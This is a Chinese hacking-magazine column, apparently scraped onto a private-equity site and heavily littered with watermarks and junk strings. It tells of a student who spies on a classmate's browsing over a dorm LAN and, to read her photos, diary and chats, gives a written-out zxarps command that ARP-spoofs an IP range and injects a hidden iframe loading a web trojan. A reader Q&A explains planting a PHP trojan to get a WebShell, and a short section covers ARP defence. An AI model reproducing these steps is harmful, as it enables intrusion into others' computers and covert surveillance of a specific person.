什么是arp欺骗|私募基金网生活频道

热度1票  浏览2次 【共0条评论】【我要评论 时间:2009年11月01日 21:09
私募社区 - 私募股权投资知识学习网 - www.simu001.cnr5\e#Ic?

『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn2R"YOV+M0`

私募社区 - 私募股权投资知识学习网 - www.simu001.cnlvx&@4_

  什么是arp欺骗?先来看个故事吧。『simu001.cn』

1t'Gd;?;a|9iF&g0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn/rt(eEX7Y PX

开学了,无视那些校园里的谈情说爱,我继续我的黑客学习,在网络中找寻到挑战的快感。但是就在昨天,一个偶然的擦肩而过激活了我的荷尔蒙。她是那么的美丽,在飘满饭菜味的食堂中我仍然隐约地闻到了与她擦肩而过时飘来的淡淡茉莉香。她是谁?以前怎么没见过?『simu001.cn』

*HP)Y4[ O0D4^+S!c0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn5AsJ Ts0T?\

  虽然宿舍的弟兄们一直嘲笑我是故意的,但我仍然认为是上帝的手推了我一把。我拿起饭盒从座位上站起来绕过她身边的那一刻,仅仅是想看看她桌子上的课本封皮,好确认她学的是什么专业。但是不知道哪个该死的,把一碗黏糊糊的粥洒在了地上,无意中踩到,我很英俊地摔倒了,饭盆和里面的剩菜以标准的抛物线落在她的脖子上。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn\,P&}1@%|%`\5pa+]D:l

私募社区 - 私募股权投资知识学习网 - www.simu001.cnr!ecVbH Q*l

  随后事情的发展进度超出了我的想象力,我们很快地就交换了姓名、专业、宿舍号码等私人信息,当然最后她也告诉我,她身上穿的那个印着卡通熊的衣服叫TeenieWeenie,一周前她父亲买给她的,价值2180元……唉,女人的衣服……怎么这么贵?『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn GVj b&}:| a7x7N

$FHH2]5_E7T0  不管怎么样,我现在都是负资产了,信用卡严重透支,虽然我知道了她的宿舍号码和姓名,但是价格也太贵了点儿吧。于是我决定,通过宿舍楼局域网,入侵她的电脑,将木马植入到她的电脑中,翻看她的照片,偷看她的日记,监视她的QQ,我太坏了。不过想想那2180元,我认为我有这个权利!『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cnT'WkF.W2|

ik*z*v-U t0  我坐在电脑前思索了许久,最终我决定用ARP欺骗敲开她电脑的大门。ARP是一种地址解析协议,该协议用来解决一个节点上的下一跳IP地址到MAC地址的转换。ARP欺骗就是截获网关数据或者伪造网关发送虚假数据的技术,以达到制造网络通讯混乱的目的。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn-`;Yk/Y5y ju

#M#AGH"m-E2G0局域网中寻找她『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn$[kx-C,d6J6lnu

Vj't[^K2U0  几经努力,我得知她宿舍的几台电脑都是一个人帮忙配的,电脑名称默认设置的是宿舍门号加姓名拼音。于是,我准备用网络监控软件Active Wall(软件下载地址:http://www.cpcw.com/bzsoft)嗅探她的位置。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn^[B8P;^PErj$Z/Y$s

'~w7b D_0  软件启动后,自动扫描嗅探出了局域网所有电脑,主界面中还会显示出每台电脑的名字和发送接收字节的多少(图1)。根据“电脑名称”找到了正在上网的她。私募社区 - 私募股权投资知识学习网 - www.simu001.cnI.p I$JzsC1s N

.S;Vq&PE2Cr0偷看她的上网记录『simu001.cn』

:k3fd&r/U j.e d0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn)xs5Z+Gmc4VhNfF/a

  我决定拦截她的访问信息,看看她上网都干了什么。点击“分组管理”中的“策略配置”,选择“HTTP过滤”选项。在新弹出的“HTTP过滤配置”对话框的“网址”页面中输入“*”号,接着在“策略规则”选项中选择“通过并记录”(图2)。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn6} M7W6iR hF(H1_

4W!nS8lv$BlJ*{M0『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cno;C(Ia+sG m+Yh[+t

私募社区 - 私募股权投资知识学习网 - www.simu001.cn `NVa@;f Y

  我之所以不在网址一栏中输入具体的网址,是因为用“*”号通配符可以知道她访问的所有网站,而不会局限于某个网站。20分钟后嗅探出的所有内容显示在“事件记录”中,我将嗅探出的网址日志复制导出,对她的浏览习惯进行了大致的分析,在这段时间里她先后登录了学校教务网站、新浪博客、Qzone、某时尚杂志网等。『simu001.cn』

4Z-d+UPD`J d x|y0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn(Qee1tgv_

成功掌控她的电脑『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn4K)G-tW:U Ku] c5v

7d1\-{#|_0  想要利用ARP欺骗实现在她的电脑中植入木马的目的,仅仅通过Active Wall嗅探是无法实现的。真正的战斗必须准备几样专业的ARP欺骗工具,分别是网络访问系统工具Winpcap、ARP欺骗工具Zxarps、网页木马。『simu001.cn』

7OI1dLu S4n0 私募社区 - 私募股权投资知识学习网 - www.simu001.cnNc5d e0BXZ9g,P

  然后我打开Windows自带的记事本,在记事本中写入“zxarps.exe -idx 0 -ip 192.168.1.8-192.168.1.11(需要欺骗的IP地址段,根据实际情况修改)-port 80 -insert " <iframe src='网页木马地址' width=0 height=0>" ”,再点击记事本的“另存为”,将内容另存为.bat格式的文件,并将该文件与Zxarps保存在同一个目录中。『simu001.cn』

3tIL"mF,ugac0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn _6@(UZBK)Xo$n

  批处理运行后,Zxarps迅速将<iframe src='网页木马地址' width=0 height=0>这段代码插入到指定的远程电脑浏览的每一个网页中(图3)。十五分钟之后,标有她名字的电脑出现在我的木马监控端中。也许从我和她相遇的那一刻起一切都是偶然,但是我相信,所谓偶然,只不过是我们对复杂的命运的无知罢了……『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn1E3ul_1kKMcF

私募社区 - 私募股权投资知识学习网 - www.simu001.cn iC8f}(D lI

『simu001.cn』

G(q"Pl y4|0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn.].pNr p+OT{

巧妙抵御ARP欺骗攻击『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cnc-Z0VR2[B*|#a

私募社区 - 私募股权投资知识学习网 - www.simu001.cn]+a5G)~[C%F

  从去年开始,ARP欺骗攻击就开始流行起来。要防御这种攻击,我们可以使用MAC绑定法来解决问题。首先在命令提示符下输入“Ipconfig/all”,然后继续在命令提示符下输入命令“ARP -s IP MAC”,就可以将MAC地址和IP地址捆绑在一起了。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn[ D_1kRVS)@(Zp}

私募社区 - 私募股权投资知识学习网 - www.simu001.cn*]0_!a;ol3Mpx-x:L3R'Y

  这样,就不会出现IP地址被盗用,不能正常使用校园网的情况了,从而有效保证电脑的安全。不过对于某些IP地址不固定的校园网来说,最好的方法仍然是使用专业的ARP防欺骗软件,例如AntiArp(软件下载地址:http://www.cpcw.com/bzsoft)。『simu001.cn』

y2X$xI'pMc'y0 私募社区 - 私募股权投资知识学习网 - www.simu001.cnDuw+w2H vD-bd/?#Q

回音壁『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn9Rd8noPY8b&NQw"I

I#lQ7q-G*m2b3Hga+[0  读者 汪冰:看过上期的《买论坛点券“附送”管理员权限》之后,我成功地进入了网站的管理后台,但是我在尝试取得WebShell的控制权时总是没有办法成功,请问要取得WebShell的控制权有什么诀窍?『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn|K$\3J TV

!oLL2H!s0Vy0  小新分析:在某些支持PHP环境的服务器中,可以通过修改“论坛博客”模块中的文件设置,将PHP作为新后缀添加上,然后再通过Blog文章发布功能将你的PHP木马上传就可以了。这种夺取WebShell的控制权的方法要求对方的服务器必须是支持ASP和PHP两种解析方式的服务器。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn.}m7E1t0_0@

私募社区 - 私募股权投资知识学习网 - www.simu001.cn]Q*FtI-F:t p

一周病毒焦点:线上游戏窃取者变种竟会关闭扬声器『simu001.cn』

{q4S6ox0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn xeJIh)ff},Bi

  警惕程度:★★★『simu001.cn』

#?imn*{;C0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn;h5wOEF:~

  危害指数:★★★『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn2mF["}_E1fT

LK:X-xPt0  瑞星监测网监测到线上游戏窃取者变种LUF(Trojan.PSW.Win32.GameOL.luf)病毒在网络上大肆传播。它是一个用VC语言编写的木马。运行后,首先将系统的扬声器设置成静音,避免杀毒软件和安全工具发出警告声响,并试图关闭多种主流杀毒软件和安全工具。『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn#UDT;zoA5x\{

U)LX8_.`cG0  然后它将自身复制到系统目录下,修改注册表启动项实现开机自启动。同时,还会加载到所有进程中,在后台监视和窃取用户网游账号、密码等信息,并发送到黑客指定的邮箱使玩家蒙受损失。『simu001.cn』

z-OTS)@nS`0 私募社区 - 私募股权投资知识学习网 - www.simu001.cn(p(`8}Ll~"a f

  清除方法:使用最新病毒库的杀毒软件查杀,例如瑞星的病毒库要升级到20.35版。此外,我们可以使用能保护网游账号和密码的一些专用工具,防止它们被病毒窃取。 『simu001.cn』私募社区 - 私募股权投资知识学习网 - www.simu001.cn.b L9h%?&Z?

顶:0 踩:0
对本文中的事件或人物打分:
当前平均分:0 (0次打分)
对本篇资讯内容的质量打分:
当前平均分:0 (0次打分)
上一篇 下一篇
发表评论
换一张

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】

网络资源